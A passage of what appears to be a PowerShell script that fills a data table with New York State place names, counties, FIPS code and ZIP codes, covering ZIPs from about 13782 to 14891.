$Cities.Rows.Add("Hamden","Delaware","New york","NY","36","13782") + $null = $Cities.Rows.Add("Cadosia","Delaware","New york","NY","36","13783") + $null = $Cities.Rows.Add("Harpersfield","Delaware","New york","NY","36","13786") + $null = $Cities.Rows.Add("Harpursville","Broome","New york","NY","36","13787") + $null = $Cities.Rows.Add("Hobart","Delaware","New york","NY","36","13788") + $null = $Cities.Rows.Add("Johnson city","Broome","New york","NY","36","13790") + $null = $Cities.Rows.Add("Kirkwood","Broome","New york","NY","36","13795") + $null = $Cities.Rows.Add("Laurens","Otsego","New york","NY","36","13796") + $null = $Cities.Rows.Add("Lisle","Broome","New york","NY","36","13797") + $null = $Cities.Rows.Add("Zcta 137hh","Broome","New york","NY","36","137HH") + $null = $Cities.Rows.Add("Mc donough","Chenango","New york","NY","36","13801") + $null = $Cities.Rows.Add("Maine","Broome","New york","NY","36","13802") + $null = $Cities.Rows.Add("Marathon","Cortland","New york","NY","36","13803") + $null = $Cities.Rows.Add("Masonville","Delaware","New york","NY","36","13804") + $null = $Cities.Rows.Add("Milford","Otsego","New york","NY","36","13807") + $null = $Cities.Rows.Add("Morris","Otsego","New york","NY","36","13808") + $null = $Cities.Rows.Add("Mount upton","Chenango","New york","NY","36","13809") + $null = $Cities.Rows.Add("Mount vision","Otsego","New york","NY","36","13810") + $null = $Cities.Rows.Add("Newark valley","Tioga","New york","NY","36","13811") + $null = $Cities.Rows.Add("Nichols","Tioga","New york","NY","36","13812") + $null = $Cities.Rows.Add("Nineveh","Broome","New york","NY","36","13813") + $null = $Cities.Rows.Add("Norwich","Chenango","New york","NY","36","13815") + $null = $Cities.Rows.Add("Oneonta","Otsego","New york","NY","36","13820") + $null = $Cities.Rows.Add("Otego","Otsego","New york","NY","36","13825") + $null = $Cities.Rows.Add("Owego","Tioga","New york","NY","36","13827") + $null = $Cities.Rows.Add("Brisben","Chenango","New york","NY","36","13830") + $null = $Cities.Rows.Add("Plymouth","Chenango","New york","NY","36","13832") + $null = $Cities.Rows.Add("Sanitaria spring","Broome","New york","NY","36","13833") + $null = $Cities.Rows.Add("Portlandville","Otsego","New york","NY","36","13834") + $null = $Cities.Rows.Add("Richford","Tioga","New york","NY","36","13835") + $null = $Cities.Rows.Add("Sidney","Delaware","New york","NY","36","13838") + $null = $Cities.Rows.Add("Sidney center","Delaware","New york","NY","36","13839") + $null = $Cities.Rows.Add("Smithville flats","Chenango","New york","NY","36","13841") + $null = $Cities.Rows.Add("South kortright","Delaware","New york","NY","36","13842") + $null = $Cities.Rows.Add("South new berlin","Chenango","New york","NY","36","13843") + $null = $Cities.Rows.Add("South plymouth","Chenango","New york","NY","36","13844") + $null = $Cities.Rows.Add("Treadwell","Delaware","New york","NY","36","13846") + $null = $Cities.Rows.Add("Unadilla","Otsego","New york","NY","36","13849") + $null = $Cities.Rows.Add("Vestal","Broome","New york","NY","36","13850") + $null = $Cities.Rows.Add("Walton","Delaware","New york","NY","36","13856") + $null = $Cities.Rows.Add("Wells bridge","Otsego","New york","NY","36","13859") + $null = $Cities.Rows.Add("West oneonta","Otsego","New york","NY","36","13861") + $null = $Cities.Rows.Add("Whitney point","Broome","New york","NY","36","13862") + $null = $Cities.Rows.Add("Willet","Cortland","New york","NY","36","13863") + $null = $Cities.Rows.Add("Willseyville","Tioga","New york","NY","36","13864") + $null = $Cities.Rows.Add("Windsor","Broome","New york","NY","36","13865") + $null = $Cities.Rows.Add("Zcta 138hh","Broome","New york","NY","36","138HH") + $null = $Cities.Rows.Add("Binghamton","Broome","New york","NY","36","13901") + $null = $Cities.Rows.Add("Binghamton","Broome","New york","NY","36","13903") + $null = $Cities.Rows.Add("Binghamton","Broome","New york","NY","36","13904") + $null = $Cities.Rows.Add("Binghamton","Broome","New york","NY","36","13905") + $null = $Cities.Rows.Add("Zcta 139hh","Broome","New york","NY","36","139HH") + $null = $Cities.Rows.Add("Akron","Erie","New york","NY","36","14001") + $null = $Cities.Rows.Add("Alden","Erie","New york","NY","36","14004") + $null = $Cities.Rows.Add("Alexander","Genesee","New york","NY","36","14005") + $null = $Cities.Rows.Add("Angola","Erie","New york","NY","36","14006") + $null = $Cities.Rows.Add("Appleton","Niagara","New york","NY","36","14008") + $null = $Cities.Rows.Add("Arcade","Wyoming","New york","NY","36","14009") + $null = $Cities.Rows.Add("Attica","Wyoming","New york","NY","36","14011") + $null = $Cities.Rows.Add("Barker","Niagara","New york","NY","36","14012") + $null = $Cities.Rows.Add("Basom","Genesee","New york","NY","36","14013") + $null = $Cities.Rows.Add("Batavia","Genesee","New york","NY","36","14020") + $null = $Cities.Rows.Add("Bliss","Wyoming","New york","NY","36","14024") + $null = $Cities.Rows.Add("Boston","Erie","New york","NY","36","14025") + $null = $Cities.Rows.Add("Bowmansville","Erie","New york","NY","36","14026") + $null = $Cities.Rows.Add("Burt","Niagara","New york","NY","36","14028") + $null = $Cities.Rows.Add("Chaffee","Erie","New york","NY","36","14030") + $null = $Cities.Rows.Add("Clarence","Erie","New york","NY","36","14031") + $null = $Cities.Rows.Add("Clarence center","Erie","New york","NY","36","14032") + $null = $Cities.Rows.Add("Colden","Erie","New york","NY","36","14033") + $null = $Cities.Rows.Add("Collins","Erie","New york","NY","36","14034") + $null = $Cities.Rows.Add("Corfu","Genesee","New york","NY","36","14036") + $null = $Cities.Rows.Add("Cowlesville","Wyoming","New york","NY","36","14037") + $null = $Cities.Rows.Add("Dale","Wyoming","New york","NY","36","14039") + $null = $Cities.Rows.Add("Darien center","Genesee","New york","NY","36","14040") + $null = $Cities.Rows.Add("Delevan","Cattaraugus","New york","NY","36","14042") + $null = $Cities.Rows.Add("Depew","Erie","New york","NY","36","14043") + $null = $Cities.Rows.Add("Derby","Erie","New york","NY","36","14047") + $null = $Cities.Rows.Add("Van buren bay","Chautauqua","New york","NY","36","14048") + $null = $Cities.Rows.Add("Swormville","Erie","New york","NY","36","14051") + $null = $Cities.Rows.Add("East aurora","Erie","New york","NY","36","14052") + $null = $Cities.Rows.Add("East bethany","Genesee","New york","NY","36","14054") + $null = $Cities.Rows.Add("East concord","Erie","New york","NY","36","14055") + $null = $Cities.Rows.Add("Eden","Erie","New york","NY","36","14057") + $null = $Cities.Rows.Add("Elba","Genesee","New york","NY","36","14058") + $null = $Cities.Rows.Add("Elma","Erie","New york","NY","36","14059") + $null = $Cities.Rows.Add("Farmersville sta","Cattaraugus","New york","NY","36","14060") + $null = $Cities.Rows.Add("Forestville","Chautauqua","New york","NY","36","14062") + $null = $Cities.Rows.Add("Fredonia","Chautauqua","New york","NY","36","14063") + $null = $Cities.Rows.Add("Freedom","Cattaraugus","New york","NY","36","14065") + $null = $Cities.Rows.Add("Gainesville","Wyoming","New york","NY","36","14066") + $null = $Cities.Rows.Add("Gasport","Niagara","New york","NY","36","14067") + $null = $Cities.Rows.Add("Getzville","Erie","New york","NY","36","14068") + $null = $Cities.Rows.Add("Glenwood","Erie","New york","NY","36","14069") + $null = $Cities.Rows.Add("Gowanda","Cattaraugus","New york","NY","36","14070") + $null = $Cities.Rows.Add("Grand island","Erie","New york","NY","36","14072") + $null = $Cities.Rows.Add("Hamburg","Erie","New york","NY","36","14075") + $null = $Cities.Rows.Add("Holland","Erie","New york","NY","36","14080") + $null = $Cities.Rows.Add("Irving","Erie","New york","NY","36","14081") + $null = $Cities.Rows.Add("Java center","Wyoming","New york","NY","36","14082") + $null = $Cities.Rows.Add("Java village","Wyoming","New york","NY","36","14083") + $null = $Cities.Rows.Add("Lake view","Erie","New york","NY","36","14085") + $null = $Cities.Rows.Add("Lancaster","Erie","New york","NY","36","14086") + $null = $Cities.Rows.Add("Lawtons","Erie","New york","NY","36","14091") + $null = $Cities.Rows.Add("Lewiston","Niagara","New york","NY","36","14092") + $null = $Cities.Rows.Add("Lockport","Niagara","New york","NY","36","14094") + $null = $Cities.Rows.Add("Lyndonville","Orleans","New york","NY","36","14098") + $null = $Cities.Rows.Add("Zcta 140hh","Chautauqua","New york","NY","36","140HH") + $null = $Cities.Rows.Add("Machias","Cattaraugus","New york","NY","36","14101") + $null = $Cities.Rows.Add("Marilla","Erie","New york","NY","36","14102") + $null = $Cities.Rows.Add("Medina","Orleans","New york","NY","36","14103") + $null = $Cities.Rows.Add("Middleport","Niagara","New york","NY","36","14105") + $null = $Cities.Rows.Add("Newfane","Niagara","New york","NY","36","14108") + $null = $Cities.Rows.Add("North collins","Erie","New york","NY","36","14111") + $null = $Cities.Rows.Add("North java","Wyoming","New york","NY","36","14113") + $null = $Cities.Rows.Add("North tonawanda","Niagara","New york","NY","36","14120") + $null = $Cities.Rows.Add("Oakfield","Genesee","New york","NY","36","14125") + $null = $Cities.Rows.Add("Orchard park","Erie","New york","NY","36","14127") + $null = $Cities.Rows.Add("Perrysburg","Cattaraugus","New york","NY","36","14129") + $null = $Cities.Rows.Add("Ransomville","Niagara","New york","NY","36","14131") + $null = $Cities.Rows.Add("Sanborn","Niagara","New york","NY","36","14132") + $null = $Cities.Rows.Add("Sardinia","Erie","New york","NY","36","14134") + $null = $Cities.Rows.Add("Silver creek","Chautauqua","New york","NY","36","14136") + $null = $Cities.Rows.Add("South dayton","Cattaraugus","New york","NY","36","14138") + $null = $Cities.Rows.Add("South wales","Erie","New york","NY","36","14139") + $null = $Cities.Rows.Add("Springville","Erie","New york","NY","36","14141") + $null = $Cities.Rows.Add("Stafford","Genesee","New york","NY","36","14143") + $null = $Cities.Rows.Add("Strykersville","Wyoming","New york","NY","36","14145") + $null = $Cities.Rows.Add("Tonawanda","Erie","New york","NY","36","14150") + $null = $Cities.Rows.Add("Varysburg","Wyoming","New york","NY","36","14167") + $null = $Cities.Rows.Add("West falls","Erie","New york","NY","36","14170") + $null = $Cities.Rows.Add("West valley","Cattaraugus","New york","NY","36","14171") + $null = $Cities.Rows.Add("Wilson","Niagara","New york","NY","36","14172") + $null = $Cities.Rows.Add("Youngstown","Niagara","New york","NY","36","14174") + $null = $Cities.Rows.Add("Zcta 141hh","Chautauqua","New york","NY","36","141HH") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14201") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14202") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14203") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14204") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14206") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14207") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14208") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14209") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14210") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14211") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14212") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14213") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14214") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14215") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14216") + $null = $Cities.Rows.Add("Kenmore","Erie","New york","NY","36","14217") + $null = $Cities.Rows.Add("Lackawanna","Erie","New york","NY","36","14218") + $null = $Cities.Rows.Add("Blasdell","Erie","New york","NY","36","14219") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14220") + $null = $Cities.Rows.Add("Williamsville","Erie","New york","NY","36","14221") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14222") + $null = $Cities.Rows.Add("Buffalo","Erie","New york","NY","36","14223") + $null = $Cities.Rows.Add("West seneca","Erie","New york","NY","36","14224") + $null = $Cities.Rows.Add("Cheektowaga","Erie","New york","NY","36","14225") + $null = $Cities.Rows.Add("Amherst","Erie","New york","NY","36","14226") + $null = $Cities.Rows.Add("Cheektowaga","Erie","New york","NY","36","14227") + $null = $Cities.Rows.Add("Amherst","Erie","New york","NY","36","14228") + $null = $Cities.Rows.Add("Zcta 142hh","Erie","New york","NY","36","142HH") + $null = $Cities.Rows.Add("Niagara falls","Niagara","New york","NY","36","14301") + $null = $Cities.Rows.Add("Niagara falls","Niagara","New york","NY","36","14303") + $null = $Cities.Rows.Add("Niagara falls","Niagara","New york","NY","36","14304") + $null = $Cities.Rows.Add("Niagara falls","Niagara","New york","NY","36","14305") + $null = $Cities.Rows.Add("Zcta 143hh","Niagara","New york","NY","36","143HH") + $null = $Cities.Rows.Add("Albion","Orleans","New york","NY","36","14411") + $null = $Cities.Rows.Add("Avon","Livingston","New york","NY","36","14414") + $null = $Cities.Rows.Add("Bellona","Yates","New york","NY","36","14415") + $null = $Cities.Rows.Add("Bergen","Genesee","New york","NY","36","14416") + $null = $Cities.Rows.Add("Branchport","Yates","New york","NY","36","14418") + $null = $Cities.Rows.Add("Brockport","Monroe","New york","NY","36","14420") + $null = $Cities.Rows.Add("Byron","Genesee","New york","NY","36","14422") + $null = $Cities.Rows.Add("Caledonia","Livingston","New york","NY","36","14423") + $null = $Cities.Rows.Add("Canandaigua","Ontario","New york","NY","36","14424") + $null = $Cities.Rows.Add("Canandaigua","Ontario","New york","NY","36","14425") + $null = $Cities.Rows.Add("Castile","Wyoming","New york","NY","36","14427") + $null = $Cities.Rows.Add("Clifton","Monroe","New york","NY","36","14428") + $null = $Cities.Rows.Add("Clifton springs","Ontario","New york","NY","36","14432") + $null = $Cities.Rows.Add("Clyde","Wayne","New york","NY","36","14433") + $null = $Cities.Rows.Add("Conesus","Livingston","New york","NY","36","14435") + $null = $Cities.Rows.Add("Dansville","Livingston","New york","NY","36","14437") + $null = $Cities.Rows.Add("Dresden","Yates","New york","NY","36","14441") + $null = $Cities.Rows.Add("East rochester","Monroe","New york","NY","36","14445") + $null = $Cities.Rows.Add("Fairport","Monroe","New york","NY","36","14450") + $null = $Cities.Rows.Add("Geneseo","Livingston","New york","NY","36","14454") + $null = $Cities.Rows.Add("Geneva","Ontario","New york","NY","36","14456") + $null = $Cities.Rows.Add("Groveland","Livingston","New york","NY","36","14462") + $null = $Cities.Rows.Add("Hamlin","Monroe","New york","NY","36","14464") + $null = $Cities.Rows.Add("Hemlock","Ontario","New york","NY","36","14466") + $null = $Cities.Rows.Add("Henrietta","Monroe","New york","NY","36","14467") + $null = $Cities.Rows.Add("Hilton","Monroe","New york","NY","36","14468") + $null = $Cities.Rows.Add("Bloomfield","Ontario","New york","NY","36","14469") + $null = $Cities.Rows.Add("Hulberton","Orleans","New york","NY","36","14470") + $null = $Cities.Rows.Add("Honeoye","Ontario","New york","NY","36","14471") + $null = $Cities.Rows.Add("Honeoye falls","Monroe","New york","NY","36","14472") + $null = $Cities.Rows.Add("Ionia","Ontario","New york","NY","36","14475") + $null = $Cities.Rows.Add("Kendall","Orleans","New york","NY","36","14476") + $null = $Cities.Rows.Add("Kent","Orleans","New york","NY","36","14477") + $null = $Cities.Rows.Add("Bluff point","Yates","New york","NY","36","14478") + $null = $Cities.Rows.Add("Lakeville","Livingston","New york","NY","36","14480") + $null = $Cities.Rows.Add("Leicester","Livingston","New york","NY","36","14481") + $null = $Cities.Rows.Add("Le roy","Genesee","New york","NY","36","14482") + $null = $Cities.Rows.Add("Lima","Livingston","New york","NY","36","14485") + $null = $Cities.Rows.Add("Livonia","Livingston","New york","NY","36","14487") + $null = $Cities.Rows.Add("Lyons","Wayne","New york","NY","36","14489") + $null = $Cities.Rows.Add("Zcta 144hh","Livingston","New york","NY","36","144HH") + $null = $Cities.Rows.Add("Macedon","Wayne","New york","NY","36","14502") + $null = $Cities.Rows.Add("Manchester","Ontario","New york","NY","36","14504") + $null = $Cities.Rows.Add("Marion","Wayne","New york","NY","36","14505") + $null = $Cities.Rows.Add("Mendon","Monroe","New york","NY","36","14506") + $null = $Cities.Rows.Add("Middlesex","Yates","New york","NY","36","14507") + $null = $Cities.Rows.Add("Tuscarora","Livingston","New york","NY","36","14510") + $null = $Cities.Rows.Add("Naples","Ontario","New york","NY","36","14512") + $null = $Cities.Rows.Add("Newark","Wayne","New york","NY","36","14513") + $null = $Cities.Rows.Add("North chili","Monroe","New york","NY","36","14514") + $null = $Cities.Rows.Add("North rose","Wayne","New york","NY","36","14516") + $null = $Cities.Rows.Add("Nunda","Livingston","New york","NY","36","14517") + $null = $Cities.Rows.Add("Ontario","Wayne","New york","NY","36","14519") + $null = $Cities.Rows.Add("Hayt corners","Seneca","New york","NY","36","14521") + $null = $Cities.Rows.Add("Palmyra","Wayne","New york","NY","36","14522") + $null = $Cities.Rows.Add("Linwood","Genesee","New york","NY","36","14525") + $null = $Cities.Rows.Add("Penfield","Monroe","New york","NY","36","14526") + $null = $Cities.Rows.Add("Penn yan","Yates","New york","NY","36","14527") + $null = $Cities.Rows.Add("Perry","Wyoming","New york","NY","36","14530") + $null = $Cities.Rows.Add("Phelps","Ontario","New york","NY","36","14532") + $null = $Cities.Rows.Add("Wadsworth","Livingston","New york","NY","36","14533") + $null = $Cities.Rows.Add("Pittsford","Monroe","New york","NY","36","14534") + $null = $Cities.Rows.Add("Portageville","Wyoming","New york","NY","36","14536") + $null = $Cities.Rows.Add("Mac dougall","Seneca","New york","NY","36","14541") + $null = $Cities.Rows.Add("West rush","Monroe","New york","NY","36","14543") + $null = $Cities.Rows.Add("Rushville","Yates","New york","NY","36","14544") + $null = $Cities.Rows.Add("Scottsburg","Livingston","New york","NY","36","14545") + $null = $Cities.Rows.Add("Scottsville","Monroe","New york","NY","36","14546") + $null = $Cities.Rows.Add("Shortsville","Ontario","New york","NY","36","14548") + $null = $Cities.Rows.Add("Rock glen","Wyoming","New york","NY","36","14550") + $null = $Cities.Rows.Add("Sodus","Wayne","New york","NY","36","14551") + $null = $Cities.Rows.Add("Sodus point","Wayne","New york","NY","36","14555") + $null = $Cities.Rows.Add("Spencerport","Monroe","New york","NY","36","14559") + $null = $Cities.Rows.Add("Springwater","Livingston","New york","NY","36","14560") + $null = $Cities.Rows.Add("Stanley","Ontario","New york","NY","36","14561") + $null = $Cities.Rows.Add("Victor","Ontario","New york","NY","36","14564") + $null = $Cities.Rows.Add("Walworth","Wayne","New york","NY","36","14568") + $null = $Cities.Rows.Add("Warsaw","Wyoming","New york","NY","36","14569") + $null = $Cities.Rows.Add("Waterport","Orleans","New york","NY","36","14571") + $null = $Cities.Rows.Add("Wayland","Steuben","New york","NY","36","14572") + $null = $Cities.Rows.Add("Webster","Monroe","New york","NY","36","14580") + $null = $Cities.Rows.Add("West bloomfield","Ontario","New york","NY","36","14585") + $null = $Cities.Rows.Add("West henrietta","Monroe","New york","NY","36","14586") + $null = $Cities.Rows.Add("Williamson","Wayne","New york","NY","36","14589") + $null = $Cities.Rows.Add("Wolcott","Wayne","New york","NY","36","14590") + $null = $Cities.Rows.Add("Wyoming","Wyoming","New york","NY","36","14591") + $null = $Cities.Rows.Add("Zcta 145hh","Livingston","New york","NY","36","145HH") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14604") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14605") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14606") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14607") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14608") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14609") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14610") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14611") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14612") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14613") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14614") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14615") + $null = $Cities.Rows.Add("Greece","Monroe","New york","NY","36","14616") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14617") + $null = $Cities.Rows.Add("Twelve corners","Monroe","New york","NY","36","14618") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14619") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14620") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14621") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14622") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14623") + $null = $Cities.Rows.Add("Westgate","Monroe","New york","NY","36","14624") + $null = $Cities.Rows.Add("Panorama","Monroe","New york","NY","36","14625") + $null = $Cities.Rows.Add("Rochester","Monroe","New york","NY","36","14626") + $null = $Cities.Rows.Add("Zcta 146hh","Monroe","New york","NY","36","146HH") + $null = $Cities.Rows.Add("Jamestown","Chautauqua","New york","NY","36","14701") + $null = $Cities.Rows.Add("Allegany","Cattaraugus","New york","NY","36","14706") + $null = $Cities.Rows.Add("Alma","Allegany","New york","NY","36","14708") + $null = $Cities.Rows.Add("Angelica","Allegany","New york","NY","36","14709") + $null = $Cities.Rows.Add("Ashville","Chautauqua","New york","NY","36","14710") + $null = $Cities.Rows.Add("Belfast","Allegany","New york","NY","36","14711") + $null = $Cities.Rows.Add("Bemus point","Chautauqua","New york","NY","36","14712") + $null = $Cities.Rows.Add("Black creek","Allegany","New york","NY","36","14714") + $null = $Cities.Rows.Add("Bolivar","Allegany","New york","NY","36","14715") + $null = $Cities.Rows.Add("Brocton","Chautauqua","New york","NY","36","14716") + $null = $Cities.Rows.Add("Caneadea","Allegany","New york","NY","36","14717") + $null = $Cities.Rows.Add("Cassadaga","Chautauqua","New york","NY","36","14718") + $null = $Cities.Rows.Add("Cattaraugus","Cattaraugus","New york","NY","36","14719") + $null = $Cities.Rows.Add("Ceres","Allegany","New york","NY","36","14721") + $null = $Cities.Rows.Add("Cherry creek","Chautauqua","New york","NY","36","14723") + $null = $Cities.Rows.Add("Clymer","Chautauqua","New york","NY","36","14724") + $null = $Cities.Rows.Add("Conewango valley","Cattaraugus","New york","NY","36","14726") + $null = $Cities.Rows.Add("Cuba","Allegany","New york","NY","36","14727") + $null = $Cities.Rows.Add("Dewittville","Chautauqua","New york","NY","36","14728") + $null = $Cities.Rows.Add("East otto","Cattaraugus","New york","NY","36","14729") + $null = $Cities.Rows.Add("Ellicottville","Cattaraugus","New york","NY","36","14731") + $null = $Cities.Rows.Add("Falconer","Chautauqua","New york","NY","36","14733") + $null = $Cities.Rows.Add("Fillmore","Allegany","New york","NY","36","14735") + $null = $Cities.Rows.Add("Findley lake","Chautauqua","New york","NY","36","14736") + $null = $Cities.Rows.Add("Franklinville","Cattaraugus","New york","NY","36","14737") + $null = $Cities.Rows.Add("Frewsburg","Chautauqua","New york","NY","36","14738") + $null = $Cities.Rows.Add("Friendship","Allegany","New york","NY","36","14739") + $null = $Cities.Rows.Add("Gerry","Chautauqua","New york","NY","36","14740") + $null = $Cities.Rows.Add("Great valley","Cattaraugus","New york","NY","36","14741") + $null = $Cities.Rows.Add("Ischua","Cattaraugus","New york","NY","36","14743") + $null = $Cities.Rows.Add("Houghton","Allegany","New york","NY","36","14744") + $null = $Cities.Rows.Add("Kennedy","Chautauqua","New york","NY","36","14747") + $null = $Cities.Rows.Add("Kill buck","Cattaraugus","New york","NY","36","14748") + $null = $Cities.Rows.Add("Lakewood","Chautauqua","New york","NY","36","14750") + $null = $Cities.Rows.Add("Limestone","Cattaraugus","New york","NY","36","14753") + $null = $Cities.Rows.Add("Little genesee","Allegany","New york","NY","36","14754") + $null = $Cities.Rows.Add("Little valley","Cattaraugus","New york","NY","36","14755") + $null = $Cities.Rows.Add("Mayville","Chautauqua","New york","NY","36","14757") + $null = $Cities.Rows.Add("Olean","Cattaraugus","New york","NY","36","14760") + $null = $Cities.Rows.Add("Panama","Chautauqua","New york","NY","36","14767") + $null = $Cities.Rows.Add("Portland","Chautauqua","New york","NY","36","14769") + $null = $Cities.Rows.Add("Portville","Cattaraugus","New york","NY","36","14770") + $null = $Cities.Rows.Add("Randolph","Cattaraugus","New york","NY","36","14772") + $null = $Cities.Rows.Add("Ripley","Chautauqua","New york","NY","36","14775") + $null = $Cities.Rows.Add("Rushford","Allegany","New york","NY","36","14777") + $null = $Cities.Rows.Add("Salamanca","Cattaraugus","New york","NY","36","14779") + $null = $Cities.Rows.Add("Sherman","Chautauqua","New york","NY","36","14781") + $null = $Cities.Rows.Add("Sinclairville","Chautauqua","New york","NY","36","14782") + $null = $Cities.Rows.Add("Steamburg","Cattaraugus","New york","NY","36","14783") + $null = $Cities.Rows.Add("Stockton","Chautauqua","New york","NY","36","14784") + $null = $Cities.Rows.Add("Westfield","Chautauqua","New york","NY","36","14787") + $null = $Cities.Rows.Add("Zcta 147hh","Allegany","New york","NY","36","147HH") + $null = $Cities.Rows.Add("Zcta 147xx","Cattaraugus","New york","NY","36","147XX") + $null = $Cities.Rows.Add("Addison","Steuben","New york","NY","36","14801") + $null = $Cities.Rows.Add("Alfred","Allegany","New york","NY","36","14802") + $null = $Cities.Rows.Add("Alfred station","Allegany","New york","NY","36","14803") + $null = $Cities.Rows.Add("Almond","Allegany","New york","NY","36","14804") + $null = $Cities.Rows.Add("Alpine","Schuyler","New york","NY","36","14805") + $null = $Cities.Rows.Add("Andover","Allegany","New york","NY","36","14806") + $null = $Cities.Rows.Add("Arkport","Steuben","New york","NY","36","14807") + $null = $Cities.Rows.Add("Atlanta","Steuben","New york","NY","36","14808") + $null = $Cities.Rows.Add("Wallace","Steuben","New york","NY","36","14809") + $null = $Cities.Rows.Add("Veterans adminis","Steuben","New york","NY","36","14810") + $null = $Cities.Rows.Add("Beaver dams","Schuyler","New york","NY","36","14812") + $null = $Cities.Rows.Add("Belmont","Allegany","New york","NY","36","14813") + $null = $Cities.Rows.Add("Big flats","Chemung","New york","NY","36","14814") + $null = $Cities.Rows.Add("Bradford","Schuyler","New york","NY","36","14815") + $null = $Cities.Rows.Add("Breesport","Chemung","New york","NY","36","14816") + $null = $Cities.Rows.Add("Brooktondale","Tompkins","New york","NY","36","14817") + $null = $Cities.Rows.Add("Burdett","Schuyler","New york","NY","36","14818") + $null = $Cities.Rows.Add("Cameron","Steuben","New york","NY","36","14819") + $null = $Cities.Rows.Add("Cameron mills","Steuben","New york","NY","36","14820") + $null = $Cities.Rows.Add("Campbell","Steuben","New york","NY","36","14821") + $null = $Cities.Rows.Add("Canaseraga","Allegany","New york","NY","36","14822") + $null = $Cities.Rows.Add("Canisteo","Steuben","New york","NY","36","14823") + $null = $Cities.Rows.Add("Cayuta","Schuyler","New york","NY","36","14824") + $null = $Cities.Rows.Add("Chemung","Chemung","New york","NY","36","14825") + $null = $Cities.Rows.Add("Cohocton","Steuben","New york","NY","36","14826") + $null = $Cities.Rows.Add("Corning","Steuben","New york","NY","36","14830") + $null = $Cities.Rows.Add("Dalton","Livingston","New york","NY","36","14836") + $null = $Cities.Rows.Add("Dundee","Yates","New york","NY","36","14837") + $null = $Cities.Rows.Add("Erin","Chemung","New york","NY","36","14838") + $null = $Cities.Rows.Add("Greenwood","Steuben","New york","NY","36","14839") + $null = $Cities.Rows.Add("Hammondsport","Steuben","New york","NY","36","14840") + $null = $Cities.Rows.Add("Hector","Schuyler","New york","NY","36","14841") + $null = $Cities.Rows.Add("Himrod","Yates","New york","NY","36","14842") + $null = $Cities.Rows.Add("Hornell","Steuben","New york","NY","36","14843") + $null = $Cities.Rows.Add("Horseheads","Chemung","New york","NY","36","14845") + $null = $Cities.Rows.Add("Hunt","Livingston","New york","NY","36","14846") + $null = $Cities.Rows.Add("Interlaken","Seneca","New york","NY","36","14847") + $null = $Cities.Rows.Add("Ithaca college","Tompkins","New york","NY","36","14850") + $null = $Cities.Rows.Add("Jasper","Steuben","New york","NY","36","14855") + $null = $Cities.Rows.Add("Lakemont","Yates","New york","NY","36","14857") + $null = $Cities.Rows.Add("Lindley","Steuben","New york","NY","36","14858") + $null = $Cities.Rows.Add("Lockwood","Tioga","New york","NY","36","14859") + $null = $Cities.Rows.Add("Lodi","Seneca","New york","NY","36","14860") + $null = $Cities.Rows.Add("Lowman","Chemung","New york","NY","36","14861") + $null = $Cities.Rows.Add("Millport","Chemung","New york","NY","36","14864") + $null = $Cities.Rows.Add("Montour falls","Schuyler","New york","NY","36","14865") + $null = $Cities.Rows.Add("Newfield","Tompkins","New york","NY","36","14867") + $null = $Cities.Rows.Add("Odessa","Schuyler","New york","NY","36","14869") + $null = $Cities.Rows.Add("Painted post","Steuben","New york","NY","36","14870") + $null = $Cities.Rows.Add("Pine city","Chemung","New york","NY","36","14871") + $null = $Cities.Rows.Add("Pine valley","Chemung","New york","NY","36","14872") + $null = $Cities.Rows.Add("Prattsburg","Steuben","New york","NY","36","14873") + $null = $Cities.Rows.Add("Pulteney","Steuben","New york","NY","36","14874") + $null = $Cities.Rows.Add("Rexville","Steuben","New york","NY","36","14877") + $null = $Cities.Rows.Add("Rock stream","Schuyler","New york","NY","36","14878") + $null = $Cities.Rows.Add("Savona","Steuben","New york","NY","36","14879") + $null = $Cities.Rows.Add("Scio","Allegany","New york","NY","36","14880") + $null = $Cities.Rows.Add("Slaterville spri","Tompkins","New york","NY","36","14881") + $null = $Cities.Rows.Add("Lansing","Tompkins","New york","NY","36","14882") + $null = $Cities.Rows.Add("Spencer","Tioga","New york","NY","36","14883") + $null = $Cities.Rows.Add("Swain","Allegany","New york","NY","36","14884") + $null = $Cities.Rows.Add("Troupsburg","Steuben","New york","NY","36","14885") + $null = $Cities.Rows.Add("Trumansburg","Tompkins","New york","NY","36","14886") + $null = $Cities.Rows.Add("Van etten","Chemung","New york","NY","36","14889") + $null = $Cities.Rows.Add("Watkins glen","Schuyler","New york","NY","36","14891") + $null = 